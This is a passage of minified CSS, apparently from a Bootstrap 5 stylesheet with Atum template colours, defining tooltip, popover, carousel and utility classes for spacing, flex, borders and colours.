.tooltip-arrow{bottom:0}.bs-tooltip-auto[data-popper-placement^=top] .tooltip-arrow:before,.bs-tooltip-top .tooltip-arrow:before{top:-1px;border-width:.4rem .4rem 0;border-top-color:#000}.bs-tooltip-auto[data-popper-placement^=right],.bs-tooltip-end{padding:0 .4rem}.bs-tooltip-auto[data-popper-placement^=right] .tooltip-arrow,.bs-tooltip-end .tooltip-arrow{left:0;width:.4rem;height:.8rem}.bs-tooltip-auto[data-popper-placement^=right] .tooltip-arrow:before,.bs-tooltip-end .tooltip-arrow:before{right:-1px;border-width:.4rem .4rem .4rem 0;border-right-color:#000}.bs-tooltip-auto[data-popper-placement^=bottom],.bs-tooltip-bottom{padding:.4rem 0}.bs-tooltip-auto[data-popper-placement^=bottom] .tooltip-arrow,.bs-tooltip-bottom .tooltip-arrow{top:0}.bs-tooltip-auto[data-popper-placement^=bottom] .tooltip-arrow:before,.bs-tooltip-bottom .tooltip-arrow:before{bottom:-1px;border-width:0 .4rem .4rem;border-bottom-color:#000}.bs-tooltip-auto[data-popper-placement^=left],.bs-tooltip-start{padding:0 .4rem}.bs-tooltip-auto[data-popper-placement^=left] .tooltip-arrow,.bs-tooltip-start .tooltip-arrow{right:0;width:.4rem;height:.8rem}.bs-tooltip-auto[data-popper-placement^=left] .tooltip-arrow:before,.bs-tooltip-start .tooltip-arrow:before{left:-1px;border-width:.4rem 0 .4rem .4rem;border-left-color:#000}.tooltip-inner{max-width:200px;padding:.25rem .5rem;color:#fff;text-align:center;background-color:#000;border-radius:.25rem}.popover{position:absolute;top:0;left:0;z-index:1060;display:block;max-width:276px;font-family:var(--font-sans-serif);font-style:normal;font-weight:400;line-height:1.5;text-align:left;text-align:start;text-decoration:none;text-shadow:none;text-transform:none;letter-spacing:normal;word-break:normal;word-spacing:normal;white-space:normal;line-break:auto;font-size:.8rem;word-wrap:break-word;background-color:#fff;background-clip:padding-box;border:1px solid rgba(0,0,0,.2);border-radius:.3rem}.popover .popover-arrow{position:absolute;display:block;width:1rem;height:.5rem}.popover .popover-arrow:after,.popover .popover-arrow:before{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.bs-popover-auto[data-popper-placement^=top]>.popover-arrow,.bs-popover-top>.popover-arrow{bottom:calc(-.5rem - 1px)}.bs-popover-auto[data-popper-placement^=top]>.popover-arrow:before,.bs-popover-top>.popover-arrow:before{bottom:0;border-width:.5rem .5rem 0;border-top-color:rgba(0,0,0,.25)}.bs-popover-auto[data-popper-placement^=top]>.popover-arrow:after,.bs-popover-top>.popover-arrow:after{bottom:1px;border-width:.5rem .5rem 0;border-top-color:#fff}.bs-popover-auto[data-popper-placement^=right]>.popover-arrow,.bs-popover-end>.popover-arrow{left:calc(-.5rem - 1px);width:.5rem;height:1rem}.bs-popover-auto[data-popper-placement^=right]>.popover-arrow:before,.bs-popover-end>.popover-arrow:before{left:0;border-width:.5rem .5rem .5rem 0;border-right-color:rgba(0,0,0,.25)}.bs-popover-auto[data-popper-placement^=right]>.popover-arrow:after,.bs-popover-end>.popover-arrow:after{left:1px;border-width:.5rem .5rem .5rem 0;border-right-color:#fff}.bs-popover-auto[data-popper-placement^=bottom]>.popover-arrow,.bs-popover-bottom>.popover-arrow{top:calc(-.5rem - 1px)}.bs-popover-auto[data-popper-placement^=bottom]>.popover-arrow:before,.bs-popover-bottom>.popover-arrow:before{top:0;border-width:0 .5rem .5rem;border-bottom-color:rgba(0,0,0,.25)}.bs-popover-auto[data-popper-placement^=bottom]>.popover-arrow:after,.bs-popover-bottom>.popover-arrow:after{top:1px;border-width:0 .5rem .5rem;border-bottom-color:#fff}.bs-popover-auto[data-popper-placement^=bottom] .popover-header:before,.bs-popover-bottom .popover-header:before{position:absolute;top:0;left:50%;display:block;width:1rem;margin-left:-.5rem;content:"";border-bottom:1px solid #f0f0f0}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow,.bs-popover-start>.popover-arrow{right:calc(-.5rem - 1px);width:.5rem;height:1rem}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow:before,.bs-popover-start>.popover-arrow:before{right:0;border-width:.5rem 0 .5rem .5rem;border-left-color:rgba(0,0,0,.25)}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow:after,.bs-popover-start>.popover-arrow:after{right:1px;border-width:.5rem 0 .5rem .5rem;border-left-color:#fff}.popover-header{padding:.5rem 1rem;margin-bottom:0;font-size:1rem;color:var(--template-bg-dark);background-color:#f0f0f0;border-bottom:1px solid rgba(0,0,0,.2);border-top-left-radius:calc(.3rem - 1px);border-top-right-radius:calc(.3rem - 1px)}.popover-header:empty{display:none}.popover-body{padding:1rem;color:var(--template-text-dark)}.carousel{position:relative}.carousel.pointer-event{touch-action:pan-y}.carousel-inner{position:relative;width:100%;overflow:hidden}.carousel-inner:after{display:block;clear:both;content:""}.carousel-item{position:relative;display:none;float:left;width:100%;margin-right:-100%;-webkit-backface-visibility:hidden;backface-visibility:hidden;transition:-webkit-transform .6s ease-in-out;transition:transform .6s ease-in-out;transition:transform .6s ease-in-out,-webkit-transform .6s ease-in-out}@media (prefers-reduced-motion:reduce){.carousel-item{transition:none}}.carousel-item-next,.carousel-item-prev,.carousel-item.active{display:block}.active.carousel-item-end,.carousel-item-next:not(.carousel-item-start){-webkit-transform:translateX(100%);transform:translateX(100%)}.active.carousel-item-start,.carousel-item-prev:not(.carousel-item-end){-webkit-transform:translateX(-100%);transform:translateX(-100%)}.carousel-fade .carousel-item{opacity:0;transition-property:opacity;-webkit-transform:none;transform:none}.carousel-fade .carousel-item-next.carousel-item-start,.carousel-fade .carousel-item-prev.carousel-item-end,.carousel-fade .carousel-item.active{z-index:1;opacity:1}.carousel-fade .active.carousel-item-end,.carousel-fade .active.carousel-item-start{z-index:0;opacity:0;transition:opacity 0s .6s}@media (prefers-reduced-motion:reduce){.carousel-fade .active.carousel-item-end,.carousel-fade .active.carousel-item-start{transition:none}}.carousel-control-next,.carousel-control-prev{position:absolute;top:0;bottom:0;z-index:1;display:flex;align-items:center;justify-content:center;width:15%;padding:0;color:#fff;text-align:center;background:none;border:0;opacity:.5;transition:opacity .15s ease}@media (prefers-reduced-motion:reduce){.carousel-control-next,.carousel-control-prev{transition:none}}.carousel-control-next:focus,.carousel-control-next:hover,.carousel-control-prev:focus,.carousel-control-prev:hover{color:#fff;text-decoration:none;outline:0;opacity:.9}.carousel-control-prev{left:0}.carousel-control-next{right:0}.carousel-control-next-icon,.carousel-control-prev-icon{display:inline-block;width:2rem;height:2rem;background-repeat:no-repeat;background-position:50%;background-size:100% 100%}.carousel-control-prev-icon{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23fff'%3E%3Cpath d='M11.354 1.646a.5.5 0 010 .708L5.707 8l5.647 5.646a.5.5 0 01-.708.708l-6-6a.5.5 0 010-.708l6-6a.5.5 0 01.708 0z'/%3E%3C/svg%3E")}.carousel-control-next-icon{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23fff'%3E%3Cpath d='M4.646 1.646a.5.5 0 01.708 0l6 6a.5.5 0 010 .708l-6 6a.5.5 0 01-.708-.708L10.293 8 4.646 2.354a.5.5 0 010-.708z'/%3E%3C/svg%3E")}.carousel-indicators{position:absolute;right:0;bottom:0;left:0;z-index:2;display:flex;justify-content:center;padding:0;margin-right:15%;margin-bottom:1rem;margin-left:15%;list-style:none}.carousel-indicators [data-bs-target]{box-sizing:content-box;flex:0 1 auto;width:30px;height:3px;padding:0;margin-right:3px;margin-left:3px;text-indent:-999px;cursor:pointer;background-color:#fff;background-clip:padding-box;border:0;border-top:10px solid transparent;border-bottom:10px solid transparent;opacity:.5;transition:opacity .6s ease}@media (prefers-reduced-motion:reduce){.carousel-indicators [data-bs-target]{transition:none}}.carousel-indicators .active{opacity:1}.carousel-caption{position:absolute;right:15%;bottom:1.25rem;left:15%;padding-top:1.25rem;padding-bottom:1.25rem;color:#fff;text-align:center}.carousel-dark .carousel-control-next-icon,.carousel-dark .carousel-control-prev-icon{-webkit-filter:invert(1) grayscale(100);filter:invert(1) grayscale(100)}.carousel-dark .carousel-indicators [data-bs-target]{background-color:#000}.carousel-dark .carousel-caption{color:#000}.align-baseline{vertical-align:baseline!important}.align-top{vertical-align:top!important}.align-middle{vertical-align:middle!important}.align-bottom{vertical-align:bottom!important}.align-text-bottom{vertical-align:text-bottom!important}.align-text-top{vertical-align:text-top!important}.float-start{float:left!important}.float-end{float:right!important}.float-none{float:none!important}.overflow-auto{overflow:auto!important}.overflow-hidden{overflow:hidden!important}.overflow-visible{overflow:visible!important}.overflow-scroll{overflow:scroll!important}.d-inline{display:inline!important}.d-inline-block{display:inline-block!important}.d-block{display:block!important}.d-grid{display:grid!important}.d-table{display:table!important}.d-table-row{display:table-row!important}.d-table-cell{display:table-cell!important}.d-flex{display:flex!important}.d-inline-flex{display:inline-flex!important}.d-none{display:none!important}.shadow{box-shadow:0 .5rem 1rem rgba(0,0,0,.15)!important}.shadow-sm{box-shadow:0 .125rem .25rem rgba(0,0,0,.075)!important}.shadow-lg{box-shadow:0 1rem 3rem rgba(0,0,0,.175)!important}.shadow-none{box-shadow:none!important}.position-static{position:static!important}.position-relative{position:relative!important}.position-absolute{position:absolute!important}.position-fixed{position:fixed!important}.position-sticky{position:sticky!important}.top-0{top:0!important}.top-50{top:50%!important}.top-100{top:100%!important}.bottom-0{bottom:0!important}.bottom-50{bottom:50%!important}.bottom-100{bottom:100%!important}.start-0{left:0!important}.start-50{left:50%!important}.start-100{left:100%!important}.end-0{right:0!important}.end-50{right:50%!important}.end-100{right:100%!important}.translate-middle{-webkit-transform:translate(-50%,-50%)!important;transform:translate(-50%,-50%)!important}.translate-middle-x{-webkit-transform:translateX(-50%)!important;transform:translateX(-50%)!important}.translate-middle-y{-webkit-transform:translateY(-50%)!important;transform:translateY(-50%)!important}.border{border:1px solid #dee2e6!important}.border-0{border:0!important}.border-top{border-top:1px solid #dee2e6!important}.border-top-0{border-top:0!important}.border-end{border-right:1px solid #dee2e6!important}.border-end-0{border-right:0!important}.border-bottom{border-bottom:1px solid #dee2e6!important}.border-bottom-0{border-bottom:0!important}.border-start{border-left:1px solid #dee2e6!important}.border-start-0{border-left:0!important}.border-primary{border-color:#132f53!important}.border-secondary{border-color:#495057!important}.border-success{border-color:#457d54!important}.border-info{border-color:#2a69b8!important}.border-warning{border-color:#ffb514!important}.border-danger{border-color:#c52827!important}.border-light{border-color:#f8f9fa!important}.border-dark{border-color:#212529!important}.border-atum-link-color{border-color:#2a69b8!important}.border-atum-text-dark{border-color:#495057!important}.border-action{border-color:#132f53!important}.border-error{border-color:#3b0d0c!important}.border-alert-success{border-color:#0f2f21!important}.border-white{border-color:#fff!important}.border-1{border-width:1px!important}.border-2{border-width:2px!important}.border-3{border-width:3px!important}.border-4{border-width:4px!important}.border-5{border-width:5px!important}.w-25{width:25%!important}.w-50{width:50%!important}.w-75{width:75%!important}.w-100{width:100%!important}.w-auto{width:auto!important}.mw-100{max-width:100%!important}.vw-100{width:100vw!important}.min-vw-100{min-width:100vw!important}.h-25{height:25%!important}.h-50{height:50%!important}.h-75{height:75%!important}.h-100{height:100%!important}.h-auto{height:auto!important}.mh-100{max-height:100%!important}.vh-100{height:100vh!important}.min-vh-100{min-height:100vh!important}.flex-fill{flex:1 1 auto!important}.flex-row{flex-direction:row!important}.flex-column{flex-direction:column!important}.flex-row-reverse{flex-direction:row-reverse!important}.flex-column-reverse{flex-direction:column-reverse!important}.flex-grow-0{flex-grow:0!important}.flex-grow-1{flex-grow:1!important}.flex-shrink-0{flex-shrink:0!important}.flex-shrink-1{flex-shrink:1!important}.flex-wrap{flex-wrap:wrap!important}.flex-nowrap{flex-wrap:nowrap!important}.flex-wrap-reverse{flex-wrap:wrap-reverse!important}.gap-0{gap:0!important}.gap-1{gap:.25rem!important}.gap-2{gap:.5rem!important}.gap-3{gap:1rem!important}.gap-4{gap:1.5rem!important}.gap-5{gap:3rem!important}.justify-content-start{justify-content:flex-start!important}.justify-content-end{justify-content:flex-end!important}.justify-content-center{justify-content:center!important}.justify-content-between{justify-content:space-between!important}.justify-content-around{justify-content:space-around!important}.justify-content-evenly{justify-content:space-evenly!important}.align-items-start{align-items:flex-start!important}.align-items-end{align-items:flex-end!important}.align-items-center{align-items:center!important}.align-items-baseline{align-items:baseline!important}.align-items-stretch{align-items:stretch!important}.align-content-start{align-content:flex-start!important}.align-content-end{align-content:flex-end!important}.align-content-center{align-content:center!important}.align-content-between{align-content:space-between!important}.align-content-around{align-content:space-around!important}.align-content-stretch{align-content:stretch!important}.align-self-auto{align-self:auto!important}.align-self-start{align-self:flex-start!important}.align-self-end{align-self:flex-end!important}.align-self-center{align-self:center!important}.align-self-baseline{align-self:baseline!important}.align-self-stretch{align-self:stretch!important}.order-first{order:-1!important}.order-0{order:0!important}.order-1{order:1!important}.order-2{order:2!important}.order-3{order:3!important}.order-4{order:4!important}.order-5{order:5!important}.order-last{order:6!important}.m-0{margin:0!important}.m-1{margin:.25rem!important}.m-2{margin:.5rem!important}.m-3{margin:1rem!important}.m-4{margin:1.5rem!important}.m-5{margin:3rem!important}.m-auto{margin:auto!important}.mx-0{margin-right:0!important;margin-left:0!important}.mx-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-3{margin-right:1rem!important;margin-left:1rem!important}.mx-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-5{margin-right:3rem!important;margin-left:3rem!important}.mx-auto{margin-right:auto!important;margin-left:auto!important}.my-0{margin-top:0!important;margin-bottom:0!important}.my-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-0{margin-top:0!important}.mt-1{margin-top:.25rem!important}.mt-2{margin-top:.5rem!important}.mt-3{margin-top:1rem!important}.mt-4{margin-top:1.5rem!important}.mt-5{margin-top:3rem!important}.mt-auto{margin-top:auto!important}.me-0{margin-right:0!important}.me-1{margin-right:.25rem!important}.me-2{margin-right:.5rem!important}.me-3{margin-right:1rem!important}.me-4{margin-right:1.5rem!important}.me-5{margin-right:3rem!important}.me-auto{margin-right:auto!important}.mb-0{margin-bottom:0!important}.mb-1{margin-bottom:.25rem!important}.mb-2{margin-bottom:.5rem!important}.form-group,.mb-3{margin-bottom:1rem!important}.mb-4{margin-bottom:1.5rem!important}.mb-5{margin-bottom:3rem!important}.mb-auto{margin-bottom:auto!important}.ms-0{margin-left:0!important}.ms-1{margin-left:.25rem!important}.ms-2{margin-left:.5rem!important}.ms-3{margin-left:1rem!important}.ms-4{margin-left:1.5rem!important}.ms-5{margin-left:3rem!important}.ms-auto{margin-left:auto!important}.p-0{padding:0!important}.p-1{padding:.25rem!important}.p-2{padding:.5rem!important}.p-3{padding:1rem!important}.p-4{padding:1.5rem!important}.p-5{padding:3rem!important}.px-0{padding-right:0!important;padding-left:0!important}.px-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-3{padding-right:1rem!important;padding-left:1rem!important}.px-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-5{padding-right:3rem!important;padding-left:3rem!important}.py-0{padding-top:0!important;padding-bottom:0!important}.py-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-0{padding-top:0!important}.pt-1{padding-top:.25rem!important}.pt-2{padding-top:.5rem!important}.pt-3{padding-top:1rem!important}.pt-4{padding-top:1.5rem!important}.pt-5{padding-top:3rem!important}.pe-0{padding-right:0!important}.pe-1{padding-right:.25rem!important}.pe-2{padding-right:.5rem!important}.pe-3{padding-right:1rem!important}.pe-4{padding-right:1.5rem!important}.pe-5{padding-right:3rem!important}.pb-0{padding-bottom:0!important}.pb-1{padding-bottom:.25rem!important}.pb-2{padding-bottom:.5rem!important}.pb-3{padding-bottom:1rem!important}.pb-4{padding-bottom:1.5rem!important}.pb-5{padding-bottom:3rem!important}.ps-0{padding-left:0!important}.ps-1{padding-left:.25rem!important}.ps-2{padding-left:.5rem!important}.ps-3{padding-left:1rem!important}.ps-4{padding-left:1.5rem!important}.ps-5{padding-left:3rem!important}.font-monospace{font-family:var(--font-monospace)!important}.fs-1{font-size:calc(1.29rem + .48vw)!important}.fs-2{font-size:calc(1.275rem + .3vw)!important}.fs-3{font-size:1.25rem!important}.fs-4{font-size:1rem!important}.fs-5{font-size:.9286rem!important}.fs-6{font-size:.8571rem!important}.fst-italic{font-style:italic!important}.fst-normal{font-style:normal!important}.fw-light{font-weight:300!important}.fw-lighter{font-weight:lighter!important}.fw-normal{font-weight:400!important}.fw-bold{font-weight:700!important}.fw-bolder{font-weight:bolder!important}.lh-1{line-height:1!important}.lh-sm{line-height:1.25!important}.lh-base{line-height:1.5!important}.lh-lg{line-height:2!important}.text-start{text-align:left!important}.text-end{text-align:right!important}.text-center{text-align:center!important}.text-decoration-none{text-decoration:none!important}.text-decoration-underline{text-decoration:underline!important}.text-decoration-line-through{text-decoration:line-through!important}.text-lowercase{text-transform:lowercase!important}.text-uppercase{text-transform:uppercase!important}.text-capitalize{text-transform:capitalize!important}.text-wrap{white-space:normal!important}.text-nowrap{white-space:nowrap!important}.text-break{word-wrap:break-word!important;word-break:break-word!important}.text-primary{color:#132f53!important}.text-secondary{color:#495057!important}.text-success{color:#457d54!important}.text-info{color:#2a69b8!important}.text-warning{color:#ffb514!important}.text-danger{color:#c52827!important}.text-light{color:#f8f9fa!important}.text-dark{color:#212529!important}.text-atum-link-color{color:#2a69b8!important}.text-atum-text-dark{color:#495057!important}.text-action{color:#132f53!important}.text-error{color:#3b0d0c!important}.text-alert-success{color:#0f2f21!important}.text-white{color:#fff!important}.text-body{color:var(--template-text-dark)!important}.text-muted{color:#666e76!important}.text-black-50{color:rgba(0,0,0,.5)!important}.text-white-50{color:hsla(0,0%,100%,.5)!important}.text-reset{color:inherit!important}.bg-primary{background-color:#132f53!important}.bg-secondary{background-color:#495057!important}.bg-success{background-color:#457d54!important}.bg-info{background-color:#2a69b8!important}.bg-warning{background-color:#ffb514!important}.bg-danger{background-color:#c52827!important}.bg-light{background-color:#f8f9fa!important}.bg-dark{background-color:#212529!important}.bg-atum-link-color{background-color:#2a69b8!important}.bg-atum-text-dark{background-color:#495057!important}.bg-action{background-color:#132f53!important}.bg-error{background-color:#3b0d0c!important}.bg-alert-success{background-color:#0f2f21!important}.bg-body,.bg-white{background-color:#fff!important}.bg-transparent{background-color:transparent!important}.bg-gradient{background-image:var(--gradient)!important}.user-select-all{-webkit-user-select:all!important;-moz-user-select:all!important;-ms-user-select:all!important;user-select:all!important}.user-select-auto{-webkit-user-select:auto!important;-moz-user-select:auto!important;-ms-user-select:auto!important;user-select:auto!important}.user-select-none{-webkit-user-select:none!important;-moz-user-select:none!important;-ms-user-select:none!important;user-select:none!important}.pe-none{pointer-events:none!important}.pe-auto{pointer-events:auto!important}.rounded{border-radius:.25rem!important}.rounded-0{border-radius:0!important}.rounded-1{border-radius:.2rem!important}.rounded-2{border-radius:.25rem!important}.rounded-3{border-radius:.3rem!important}.rounded-circle{border-radius:50%!important}.rounded-pill{border-radius:50rem!important}.rounded-top{border-top-left-radius:.25rem!important}.rounded-end,.rounded-top{border-top-right-radius:.25rem!important}.rounded-bottom,.rounded-end{border-bottom-right-radius:.25rem!important}.rounded-bottom,.rounded-start{border-bottom-left-radius:.25rem!important}.rounded-start{border-top-left-radius:.25rem!important}.visible{visibility:visible!important}.invisible{visibility:hidden!important}@media (min-width:576px){.float-sm-start{float:left!important}.float-sm-end{float:right!important}.float-sm-none{float:none!important}.d-sm-inline{display:inline!important}.d-sm-inline-block{display:inline-block!important}.d-sm-block{display:block!important}.d-sm-grid{display:grid!important}.d-sm-table{display:table!important}.d-sm-table-row{display:table-row!important}.d-sm-table-cell{display:table-cell!important}.d-sm-flex{display:flex!important}.d-sm-inline-flex{display:inline-flex!important}.d-sm-none{display:none!important}.flex-sm-fill{flex:1 1 auto!important}.flex-sm-row{flex-direction:row!important}.flex-sm-column{flex-direction:column!important}.flex-sm-row-reverse{flex-direction:row-reverse!important}.flex-sm-column-reverse{flex-direction:column-reverse!important}.flex-sm-grow-0{flex-grow:0!important}.flex-sm-grow-1{flex-grow:1!important}.flex-sm-shrink-0{flex-shrink:0!important}.flex-sm-shrink-1{flex-shrink:1!important}.flex-sm-wrap{flex-wrap:wrap!important}.flex-sm-nowrap{flex-wrap:nowrap!important}.flex-sm-wrap-reverse{flex-wrap:wrap-reverse!important}.gap-sm-0{gap:0!important}.gap-sm-1{gap:.25rem!important}.gap-sm-2{gap:.5rem!important}.gap-sm-3{gap:1rem!important}.gap-sm-4{gap:1.5rem!important}.gap-sm-5{gap:3rem!important}.justify-content-sm-start{justify-content:flex-start!important}.justify-content-sm-end{justify-content:flex-end!important}.justify-content-sm-center{justify-content:center!important}.justify-content-sm-between{justify-content:space-between!important}.justify-content-sm-around{justify-content:space-around!important}.justify-content-sm-evenly{justify-content:space-evenly!important}.align-items-sm-start{align-items:flex-start!important}.align-items-sm-end{align-items:flex-end!important}.align-items-sm-center{align-items:center!important}.align-items-sm-baseline{align-items:baseline!important}.align-items-sm-stretch{align-items:stretch!important}.align-content-sm-start{align-content:flex-start!important}.align-content-sm-end{align-content:flex-end!important}.align-content-sm-center{align-content:center!important}.align-content-sm-between{align-content:space-between!important}.align-content-sm-around{align-content:space-around!important}.align-content-sm-stretch{align-content:stretch!important}.align-self-sm-auto{align-self:auto!important}.align-self-sm-start{align-self:flex-start!important}.align-self-sm-end{align-self:flex-end!important}.align-self-sm-center{align-self:center!important}.align-self-sm-baseline{align-self:baseline!important}.align-self-sm-stretch{align-self:stretch!important}.order-sm-first{order:-1!important}.order-sm-0{order:0!important}.order-sm-1{order:1!important}.order-sm-2{order:2!important}.order-sm-3{order:3!important}.order-sm-4{order:4!important}.order-sm-5{order:5!important}.order-sm-last{order:6!important}.m-sm-0{margin:0!important}.m-sm-1{margin:.25rem!important}.m-sm-2{margin:.5rem!important}.m-sm-3{margin:1rem!important}.m-sm-4{margin:1.5rem!important}.m-sm-5{margin:3rem!important}.m-sm-auto{margin:auto!important}.mx-sm-0{margin-right:0!important;margin-left:0!important}.mx-sm-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-sm-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-sm-3{margin-right:1rem!important;margin-left:1rem!important}.mx-sm-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-sm-5{margin-right:3rem!important;margin-left:3rem!important}.mx-sm-auto{margin-right:auto!important;margin-left:auto!important}.my-sm-0{margin-top:0!important;margin-bottom:0!important}.my-sm-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-sm-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-sm-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-sm-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-sm-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-sm-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-sm-0{margin-top:0!important}.mt-sm-1{margin-top:.25rem!important}.mt-sm-2{margin-top:.5rem!important}.mt-sm-3{margin-top:1rem!important}.mt-sm-4{margin-top:1.5rem!important}.mt-sm-5{margin-top:3rem!important}.mt-sm-auto{margin-top:auto!important}.me-sm-0{margin-right:0!important}.me-sm-1{margin-right:.25rem!important}.me-sm-2{margin-right:.5rem!important}.me-sm-3{margin-right:1rem!important}.me-sm-4{margin-right:1.5rem!important}.me-sm-5{margin-right:3rem!important}.me-sm-auto{margin-right:auto!important}.mb-sm-0{margin-bottom:0!important}.mb-sm-1{margin-bottom:.25rem!important}.mb-sm-2{margin-bottom:.5rem!important}.mb-sm-3{margin-bottom:1rem!important}.mb-sm-4{margin-bottom:1.5rem!important}.mb-sm-5{margin-bottom:3rem!important}.mb-sm-auto{margin-bottom:auto!important}.ms-sm-0{margin-left:0!important}.ms-sm-1{margin-left:.25rem!important}.ms-sm-2{margin-left:.5rem!important}.ms-sm-3{margin-left:1rem!important}.ms-sm-4{margin-left:1.5rem!important}.ms-sm-5{margin-left:3rem!important}.ms-sm-auto{margin-left:auto!important}.p-sm-0{padding:0!important}.p-sm-1{padding:.25rem!important}.p-sm-2{padding:.5rem!important}.p-sm-3{padding:1rem!important}.p-sm-4{padding:1.5rem!important}.p-sm-5{padding:3rem!important}.px-sm-0{padding-right:0!important;padding-left:0!important}.px-sm-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-sm-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-sm-3{padding-right:1rem!important;padding-left:1rem!important}.px-sm-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-sm-5{padding-right:3rem!important;padding-left:3rem!important}.py-sm-0{padding-top:0!important;padding-bottom:0!important}.py-sm-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-sm-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-sm-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-sm-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-sm-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-sm-0{padding-top:0!important}.pt-sm-1{padding-top:.25rem!important}.pt-sm-2{padding-top:.5rem!important}.pt-sm-3{padding-top:1rem!important}.pt-sm-4{padding-top:1.5rem!important}.pt-sm-5{padding-top:3rem!important}.pe-sm-0{padding-right:0!important}.pe-sm-1{padding-right:.25rem!important}.pe-sm-2{padding-right:.5rem!important}.pe-sm-3{padding-right:1rem!important}.pe-sm-4{padding-right:1.5rem!important}.pe-sm-5{padding-right:3rem!important}.pb-sm-0{padding-bottom:0!important}.pb-sm-1{padding-bottom:.25rem!important}.pb-sm-2{padding-bottom:.5rem!important}.pb-sm-3{padding-bottom:1rem!important}.pb-sm-4{padding-bottom:1.5rem!important}.pb-sm-5{padding-bottom:3rem!important}.ps-sm-0{padding-left:0!important}.ps-sm-1{padding-left:.25rem!important}.ps-sm-2{padding-left:.5rem!important}.ps-sm-3{padding-left:1rem!important}.ps-sm-4{padding-left:1.5rem!important}.ps-sm-5{padding-left:3rem!important}.text-sm-start{text-align:left!important}.text-sm-end{text-align:right!important}.text-sm-center{text-align:center!important}}@media (min-width:768px){.float-md-start{float:left!important}.float-md-end{float:right!important}.float-md-none{float:none!important}.d-md-inline{display:inline!important}.d-md-inline-block{display:inline-block!important}.d-md-block{display:block!important}.d-md-grid{display:grid!important}.d-md-table{display:table!important}.d-md-table-row{display:table-row!important}.d-md-table-cell{display:table-cell!important}.d-md-flex{display:flex!important}.d-md-inline-flex{display:inline-flex!important}.d-md-none{display:none!important}.flex-md-fill{flex:1 1 auto!important}.flex-md-row{flex-direction:row!important}.flex-md-column{flex-direction:column!important}.flex-md-row-reverse{flex-direction:row-reverse!important}.flex-md-column-reverse{flex-direction:column-reverse!important}.flex-md-grow-0{flex-grow:0!important}.flex-md-grow-1{flex-grow:1!important}.flex-md-shrink-0{flex-shrink:0!important}.flex-md-shrink-1{flex-shrink:1!important}.flex-md-wrap{flex-wrap:wrap!important}.flex-md-nowrap{flex-wrap:nowrap!important}.flex-md-wrap-reverse{flex-wrap:wrap-reverse!important}.gap-md-0{gap:0!important}.gap-md-1{gap:.25rem!important}.gap-md-2{gap:.5rem!important}.gap-md-3{gap:1rem!important}.gap-md-4{gap:1.5rem!important}.gap-md-5{gap:3rem!important}.justify-content-md-start{justify-content:flex-start!important}.justify-content-md-end{justify-content:flex-end!important}.justify-content-md-center{justify-content:center!important}.justify-content-md-between{justify-content:space-between!important}.justify-content-md-around{justify-content:space-around!important}.justify-content-md-evenly{justify-content:space-evenly!important}.align-items-md-start{align-items:flex-start!important}.align-items-md-end{align-items:flex-end!important}.align-items-md-center{align-items:center!important}.align-items-md-baseline{align-items:baseline!important}.align-items-md-stretch{align-items:stretch!important}.align-content-md-start{align-content:flex-start!important}.align-content-md-end{align-content:flex-end!important}.align-content-md-center{align-content:center!important}.align-content-md-between{align-content:space-between!important}.align-content-md-around{align-content:space-around!important}.align-content-md-stretch{align-content:stretch!important}.align-self-md-auto{align-self:auto!important}.align-self-md-start{align-self:flex-start!important}.align-self-md-end{align-self:flex-end!important}.align-self-md-center{align-self:center!important}.align-self-md-baseline{align-self:baseline!important}.align-self-md-stretch{align-self:stretch!important}.order-md-first{order:-1!important}.order-md-0{order:0!important}.order-md-1{order:1!important}.order-md-2{order:2!important}.order-md-3{order:3!important}.order-md-4{order:4!important}.order-md-5{order:5!important}.order-md-last{order:6!important}.m-md-0{margin:0!important}.m-md-1{margin:.25rem!important}.m-md-2{margin:.5rem!important}.m-md-3{margin:1rem!important}.m-md-4{margin:1.5rem!important}.m-md-5{margin:3rem!important}.m-md-auto{margin:auto!important}.mx-md-0{margin-right:0!important;margin-left:0!important}.mx-md-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-md-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-md-3{margin-right:1rem!important;margin-left:1rem!important}.mx-md-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-md-5{margin-right:3rem!important;margin-left:3rem!important}.mx-md